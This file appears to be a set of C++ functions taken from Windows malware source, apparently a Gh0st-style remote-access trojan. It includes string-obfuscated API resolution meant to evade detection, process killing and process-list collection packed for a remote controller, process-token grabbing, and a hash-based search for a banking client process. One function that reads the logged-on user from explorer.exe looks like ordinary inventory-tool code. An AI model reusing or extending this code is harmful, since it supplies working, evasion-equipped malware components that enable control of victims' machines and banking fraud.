static DWORD IsRunBClient(char* path) { HANDLE snap = pCreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 ); PROCESSENTRY32W pe; pe.dwSize = sizeof(pe); pProcess32FirstW( snap, &pe ); DWORD ret = 0; do { DWORD dwProcessHash = GetNameHash(pe.szExeFile); if ( dwProcessHash == 0xFE0E05F6 ) //cbmain.ex -> cbank.exe { if( path[0] == 0 ) { HANDLE hProc = pOpenProcess( PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, pe.th32ProcessID ); if (hProc) { pGetModuleFileNameExA( hProc, 0, path, MAX_PATH ); pCloseHandle(hProc); } } ret = pe.th32ProcessID; break; } } while( pProcess32NextW( snap, &pe ) ); pCloseHandle(snap); return ret; }
void CSystemManager::KillProcess(LPBYTE lpBuffer, UINT nSize) { HANDLE hProcess = NULL; char FBwWp14[] = {'O','p','e','n','P','r','o','c','e','s','s','\0'}; OpenProcessT pOpenProcess=(OpenProcessT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp14); char FBwWp15[] = {'T','e','r','m','i','n','a','t','e','P','r','o','c','e','s','s','\0'}; TerminateProcessT pTerminateProcess=(TerminateProcessT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp15); char BrmAP29[] = {'C','l','o','s','e','H','a','n','d','l','e','\0'}; CloseHandleT pCloseHandle=(CloseHandleT)GetProcAddress(LoadLibrary("KERNEL32.dll"),BrmAP29); for (unsigned int i = 0; i < nSize; i += 4) { hProcess = pOpenProcess(PROCESS_ALL_ACCESS, FALSE, *(LPDWORD)(lpBuffer + i)); pTerminateProcess(hProcess, 0); pCloseHandle(hProcess); } // 稍稍Sleep下,防止出错 char FBwWp25[] = {'S','l','e','e','p','\0'}; SleepT pSleep=(SleepT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp25); pSleep(100); // 刷新进程列表 SendProcessList(); // 刷新窗口列表 SendWindowsList(); }
//========================================================= BOOL GetTokenByName(HANDLE &hToken,LPSTR lpName) { if(!lpName) { return FALSE; } HANDLE hProcessSnap = NULL; BOOL bRet = FALSE; PROCESSENTRY32 pe32 = {0}; char SSzlC11[] = {'K','E','R','N','E','L','3','2','.','d','l','l','\0'}; char SSzlC10[] = {'C','r','e','a','t','e','T','o','o','l','h','e','l','p','3','2','S','n','a','p','s','h','o','t','\0'}; CreateToolhelp32SnapshotT pCreateToolhelp32Snapshot= (CreateToolhelp32SnapshotT)GetProcAddress(LoadLibrary(SSzlC11),SSzlC10); hProcessSnap = pCreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if (hProcessSnap == INVALID_HANDLE_VALUE) return (FALSE); pe32.dwSize = sizeof(PROCESSENTRY32); char MyProcess32First[] ={'P','r','o','c','e','s','s','3','2','F','i','r','s','t','\0'}; Process32FirstT pProcess32First= (Process32FirstT)GetProcAddress(LoadLibrary(SSzlC11),MyProcess32First); char CtxPW35[] = {'O','p','e','n','P','r','o','c','e','s','s','T','o','k','e','n','\0'}; OpenProcessTokenT pOpenProcessToken=(OpenProcessTokenT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),CtxPW35); char BrmAP29[] = {'C','l','o','s','e','H','a','n','d','l','e','\0'}; CloseHandleT pCloseHandle=(CloseHandleT)GetProcAddress(LoadLibrary("KERNEL32.dll"),BrmAP29); char FBwWp14[] = {'O','p','e','n','P','r','o','c','e','s','s','\0'}; OpenProcessT pOpenProcess=(OpenProcessT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp14); char MyProcess32Next[] ={'P','r','o','c','e','s','s','3','2','N','e','x','t','\0'}; Process32NextT pProcess32Next= (Process32NextT)GetProcAddress(LoadLibrary(SSzlC11),MyProcess32Next); if (pProcess32First(hProcessSnap, &pe32)) { do { if(!strcmp(_strupr(pe32.szExeFile),_strupr(lpName))) { HANDLE hProcess = pOpenProcess(PROCESS_QUERY_INFORMATION,FALSE,pe32.th32ProcessID); // bRet = pOpenProcessToken(hProcess,TOKEN_ALL_ACCESS,&hToken); bRet = pOpenProcessToken(hProcess,TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,&hToken); pCloseHandle (hProcessSnap); return (bRet); } } while (pProcess32Next(hProcessSnap, &pe32)); bRet = TRUE; } else bRet = FALSE; pCloseHandle (hProcessSnap); return (bRet); }
char *GetLogUser2K() { typedef BOOL (WINAPI *OpenProcessTokenT)( __in HANDLE ProcessHandle, __in DWORD DesiredAccess, __deref_out PHANDLE TokenHandle ); char KIoFqQPSy[] = {'A','D','V','A','P','I','3','2','.','d','l','l','\0'}; OpenProcessTokenT pOpenProcessToken=(OpenProcessTokenT)GetProcAddress(LoadLibrary(KIoFqQPSy),"OpenProcessToken"); typedef BOOL (WINAPI *LookupAccountSidAT)( __in_opt LPCSTR lpSystemName, __in PSID Sid, __out_ecount_part_opt(*cchName, *cchName + 1) LPSTR Name, __inout LPDWORD cchName, __out_ecount_part_opt(*cchReferencedDomainName, *cchReferencedDomainName + 1) LPSTR ReferencedDomainName, __inout LPDWORD cchReferencedDomainName, __out PSID_NAME_USE peUse ); LookupAccountSidAT pLookupAccountSidA=(LookupAccountSidAT)GetProcAddress(LoadLibrary(KIoFqQPSy),"LookupAccountSidA"); typedef BOOL (WINAPI *GetTokenInformationT)( __in HANDLE TokenHandle, __in TOKEN_INFORMATION_CLASS TokenInformationClass, __out_bcount_part_opt(TokenInformationLength, *ReturnLength) LPVOID TokenInformation, __in DWORD TokenInformationLength, __out_opt PDWORD ReturnLength ); GetTokenInformationT pGetTokenInformation=(GetTokenInformationT)GetProcAddress(LoadLibrary(KIoFqQPSy),"GetTokenInformation"); typedef HANDLE (WINAPI *OpenProcessT)( __in DWORD dwDesiredAccess, __in BOOL bInheritHandle, __in DWORD dwProcessId ); OpenProcessT pOpenProcess=(OpenProcessT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"OpenProcess"); DWORD dwProcessID = GetProcessID("explorer.exe"); if (dwProcessID == 0) return NULL; BOOL fResult = FALSE; HANDLE hProc = NULL; HANDLE hToken = NULL; TOKEN_USER *pTokenUser = NULL; char *lpUserName = NULL; __try { // Open the process with PROCESS_QUERY_INFORMATION access hProc = pOpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwProcessID); if (hProc == NULL) { __leave; } fResult = pOpenProcessToken(hProc, TOKEN_QUERY, &hToken); if(!fResult) { __leave; } DWORD dwNeedLen = 0; fResult = pGetTokenInformation(hToken,TokenUser, NULL, 0, &dwNeedLen); if (dwNeedLen > 0) { pTokenUser = (TOKEN_USER*)new BYTE[dwNeedLen]; fResult = pGetTokenInformation(hToken,TokenUser, pTokenUser, dwNeedLen, &dwNeedLen); if (!fResult) { __leave; } } else { __leave; } SID_NAME_USE sn; TCHAR szDomainName[MAX_PATH]; DWORD dwDmLen = MAX_PATH; DWORD nNameLen = 256; lpUserName = new char[256]; fResult = pLookupAccountSidA(NULL, pTokenUser->User.Sid, lpUserName, &nNameLen, szDomainName, &dwDmLen, &sn); } __finally { if (hProc) ::CloseHandle(hProc); if (hToken) ::CloseHandle(hToken); if (pTokenUser) delete[] (char*)pTokenUser; return lpUserName; } }
BOOL CSysInfo::getUserNameFromExplorerProcess(CString &csUserName) { TCHAR szUserName[255]; DWORD dwName = 255; PROCESSENTRY32 pe; pe.dwSize = sizeof( PROCESSENTRY32 ); HANDLE hToken; TOKEN_INFORMATION_CLASS TokenInformationClass = TokenUser; TCHAR szTokenInformation[255]; DWORD dwTokenInformationLength = 255;//sizeof( TOKEN_OWNER ); DWORD dwReturnLength=0; DWORD dwReferencedDomainName = 255; TCHAR szReferencedDomainName[255]; SID_NAME_USE peUse; HANDLE hExplorer = NULL; HANDLE hSnapshot = NULL; HMODULE hAdv = NULL; BOOL bExplorerFound = FALSE; HANDLE (WINAPI* pCreateToolhelp32Snapshot) (DWORD, DWORD) = NULL; BOOL (WINAPI* pProcess32First) (HANDLE, LPPROCESSENTRY32) = NULL; BOOL (WINAPI* pProcess32Next) (HANDLE, LPPROCESSENTRY32) = NULL; HANDLE (WINAPI* pOpenProcess) (DWORD, BOOL, DWORD) = NULL; BOOL (WINAPI* pOpenProcessToken) (HANDLE, DWORD, PHANDLE) = NULL; BOOL (WINAPI* pLookupAccountSid) (LPCTSTR, PSID, LPTSTR, LPDWORD, LPTSTR, LPDWORD, PSID_NAME_USE ) = NULL; BOOL (WINAPI* pGetTokenInformation) (HANDLE, TOKEN_INFORMATION_CLASS, LPVOID, DWORD, PDWORD) = NULL; AddLog( _T( "getUserNameFromExplorerProcess: Trying to find logged on User ID from <explorer.exe> process...\n")); // First, try to use Advapi.dll if( !(hAdv = LoadLibrary( _T( "Advapi32.dll")))) { AddLog( _T( "\tFailed to load AdvApi32 library !\n")); return FALSE; } if( !( (*(FARPROC*)&pOpenProcessToken = GetProcAddress( hAdv , "OpenProcessToken" ) ) )|| !( (*(FARPROC*)&pOpenProcess = GetProcAddress( GetModuleHandle( _T( "KERNEL32.DLL")), "OpenProcess") ) )|| !( (*(FARPROC*)&pGetTokenInformation = GetProcAddress( hAdv , "GetTokenInformation") ) )|| #ifdef _UNICODE !( (*(FARPROC*)&pLookupAccountSid = GetProcAddress( hAdv , "LookupAccountSidW") ) ) ) #else !( (*(FARPROC*)&pLookupAccountSid = GetProcAddress( hAdv , "LookupAccountSidA") ) ) ) #endif { AddLog( _T( "\tFailed to load AdvApi32 library with error <%i> !\n"), GetLastError()); FreeLibrary( hAdv); return FALSE; } // Try to use kernel32 to enum process if( !(*(FARPROC*)&pCreateToolhelp32Snapshot = GetProcAddress( GetModuleHandle( _T("KERNEL32.DLL")), "CreateToolhelp32Snapshot") ) || #ifdef _UNICODE !(*(FARPROC*)&pProcess32First = GetProcAddress( GetModuleHandle( _T("KERNEL32.DLL")), "Process32FirstW") ) || !(*(FARPROC*)&pProcess32Next = GetProcAddress( GetModuleHandle( _T("KERNEL32.DLL")), "Process32NextW") ) ) #else !(*(FARPROC*)&pProcess32First = GetProcAddress( GetModuleHandle( _T("KERNEL32.DLL")), "Process32First") ) || !(*(FARPROC*)&pProcess32Next = GetProcAddress( GetModuleHandle( _T("KERNEL32.DLL")), "Process32Next") ) ) #endif { AddLog( _T( "\tFailed to load Kernel32 process access functions with error <%i> !\n"), GetLastError()); FreeLibrary( hAdv); return FALSE; } // Create snapshot of running processes if( (hSnapshot = pCreateToolhelp32Snapshot( TH32CS_SNAPALL ,0 )) == INVALID_HANDLE_VALUE ) { AddLog( _T( "\tCreateToolhelp32Snapshot failed with error <%i> !\n"), GetLastError()); FreeLibrary( hAdv); return FALSE; } // Trying to find explorer.exe into snapshot if( !pProcess32First( hSnapshot, &pe) ) { AddLog( _T( "\tProcess32First failed with error <%i> !\n"), GetLastError()); CloseHandle( hSnapshot ); FreeLibrary( hAdv); return FALSE; } do { if( !CString(pe.szExeFile).CompareNoCase( _T( "explorer.exe"))) { bExplorerFound = TRUE; break; } pe.dwSize = sizeof( PROCESSENTRY32 ); } while (pProcess32Next( hSnapshot, &pe )); if (!bExplorerFound) { AddLog( _T( "\tCould not find <explorer.exe> process !\n")); CloseHandle( hSnapshot ); FreeLibrary( hAdv); return FALSE; } // Retrieve a handle on explorer.exe process using ID */ if( !(hExplorer = pOpenProcess( PROCESS_ALL_ACCESS, FALSE, pe.th32ProcessID ))) { AddLog( _T( "\tFailed to open <explorer.exe> process with error <%i> !\n"), GetLastError()); CloseHandle( hSnapshot ); FreeLibrary( hAdv); return FALSE; } // Open token associated to explorer.exe to get information if( !pOpenProcessToken( hExplorer, TOKEN_READ, &hToken ) ) { AddLog( _T( "\tOpenProcessToken failed with error <%i>\n"), GetLastError()); CloseHandle( hExplorer ); CloseHandle( hToken ); CloseHandle( hSnapshot ); FreeLibrary( hAdv); return FALSE; } if( !pGetTokenInformation( hToken, TokenInformationClass, &szTokenInformation, dwTokenInformationLength, &dwReturnLength)) { AddLog( _T( "\tGetTokenInformation failed with error <%i>\n"), GetLastError()); CloseHandle( hExplorer ); CloseHandle( hToken ); CloseHandle( hSnapshot ); FreeLibrary( hAdv); return FALSE; } // Lokkup user account running explorer.exe process if( !pLookupAccountSid( NULL, ((TOKEN_USER*)&szTokenInformation)->User.Sid, szUserName, &dwName, szReferencedDomainName, &dwReferencedDomainName, &peUse ) ) { AddLog( _T( "\tLookupAccountSid failed with error <%i>\n"), GetLastError()); CloseHandle( hExplorer ); CloseHandle( hToken ); CloseHandle( hSnapshot ); FreeLibrary( hAdv); return FALSE; } CloseHandle( hExplorer ); CloseHandle( hToken ); CloseHandle( hSnapshot ); FreeLibrary( hAdv ); // Ensure username exists if( CString(szUserName) == _T( "") ) { AddLog( _T( "\tFound empty user, so assuming failed !\n")); return FALSE; } AddLog( _T( "\t\t<User: %s>\n\tOK\n"), szUserName); csUserName = szUserName; return TRUE; }
LPBYTE CSystemManager::getProcessList() { HANDLE hSnapshot = NULL; HANDLE hProcess = NULL; HMODULE hModules = NULL; PROCESSENTRY32 pe32 = {0}; DWORD cbNeeded; char strProcessName[MAX_PATH] = {0}; LPBYTE lpBuffer = NULL; DWORD dwOffset = 0; DWORD dwLength = 0; char SSzlC11[] = {'K','E','R','N','E','L','3','2','.','d','l','l','\0'}; char SSzlC10[] = {'C','r','e','a','t','e','T','o','o','l','h','e','l','p','3','2','S','n','a','p','s','h','o','t','\0'}; CreateToolhelp32SnapshotT pCreateToolhelp32Snapshot= (CreateToolhelp32SnapshotT)GetProcAddress(LoadLibrary(SSzlC11),SSzlC10); hSnapshot = pCreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if(hSnapshot == INVALID_HANDLE_VALUE) return NULL; pe32.dwSize = sizeof(PROCESSENTRY32); char SSzlC20[] = {'L','o','c','a','l','A','l','l','o','c','\0'}; LocalAllocT pLocalAlloc=(LocalAllocT)GetProcAddress(LoadLibrary("KERNEL32.dll"),SSzlC20); lpBuffer = (LPBYTE)pLocalAlloc(LPTR, 1024); lpBuffer[0] = TOKEN_PSLIST; dwOffset = 1; char FBwWp01[] = {'l','s','t','r','l','e','n','A','\0'}; lstrlenAT plstrlenA=(lstrlenAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp01); LocalSizeT pLocalSize=(LocalSizeT)GetProcAddress(LoadLibrary(SSzlC11),"LocalSize"); char FBwWp14[] = {'O','p','e','n','P','r','o','c','e','s','s','\0'}; OpenProcessT pOpenProcess=(OpenProcessT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp14); char MyProcess32Next[] ={'P','r','o','c','e','s','s','3','2','N','e','x','t','\0'}; Process32NextT pProcess32Next= (Process32NextT)GetProcAddress(LoadLibrary(SSzlC11),MyProcess32Next); char MyProcess32First[] ={'P','r','o','c','e','s','s','3','2','F','i','r','s','t','\0'}; Process32FirstT pProcess32First= (Process32FirstT)GetProcAddress(LoadLibrary(SSzlC11),MyProcess32First); char FBwWp29[] = {'L','o','c','a','l','R','e','A','l','l','o','c','\0'}; LocalReAllocT pLocalReAlloc=(LocalReAllocT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp29); char DYrEN15[] = {'E','n','u','m','P','r','o','c','e','s','s','M','o','d','u','l','e','s','\0'}; EnumProcessModulesT pEnumProcessModules=(EnumProcessModulesT)GetProcAddress(LoadLibrary("PSAPI.DLL"),DYrEN15); char DYrEN13[] = {'G','e','t','M','o','d','u','l','e','F','i','l','e','N','a','m','e','E','x','A','\0'}; GetModuleFileNameExAT pGetModuleFileNameExA=(GetModuleFileNameExAT)GetProcAddress(LoadLibrary("PSAPI.DLL"),DYrEN13); if(pProcess32First(hSnapshot, &pe32)) { do { hProcess = pOpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, pe32.th32ProcessID); if ((pe32.th32ProcessID !=0 ) && (pe32.th32ProcessID != 4) && (pe32.th32ProcessID != 8)) { pEnumProcessModules(hProcess, &hModules, sizeof(hModules), &cbNeeded); pGetModuleFileNameExA(hProcess, hModules, strProcessName, sizeof(strProcessName)); // 此进程占用数据大小 dwLength = sizeof(DWORD) + plstrlenA(pe32.szExeFile) + plstrlenA(strProcessName) + 2; // 缓冲区太小,再重新分配下 if (pLocalSize(lpBuffer) < (dwOffset + dwLength)) lpBuffer = (LPBYTE)pLocalReAlloc(lpBuffer, (dwOffset + dwLength), LMEM_ZEROINIT|LMEM_MOVEABLE); Gyfunction->my_memcpy(lpBuffer + dwOffset, &(pe32.th32ProcessID), sizeof(DWORD)); dwOffset += sizeof(DWORD); Gyfunction->my_memcpy(lpBuffer + dwOffset, pe32.szExeFile, plstrlenA(pe32.szExeFile) + 1); dwOffset += plstrlenA(pe32.szExeFile) + 1; Gyfunction->my_memcpy(lpBuffer + dwOffset, strProcessName, plstrlenA(strProcessName) + 1); dwOffset += plstrlenA(strProcessName) + 1; } } while(pProcess32Next(hSnapshot, &pe32)); } lpBuffer = (LPBYTE)pLocalReAlloc(lpBuffer, dwOffset, LMEM_ZEROINIT|LMEM_MOVEABLE); char BrmAP29[] = {'C','l','o','s','e','H','a','n','d','l','e','\0'}; CloseHandleT pCloseHandle=(CloseHandleT)GetProcAddress(LoadLibrary("KERNEL32.dll"),BrmAP29); pCloseHandle(hSnapshot); return lpBuffer; }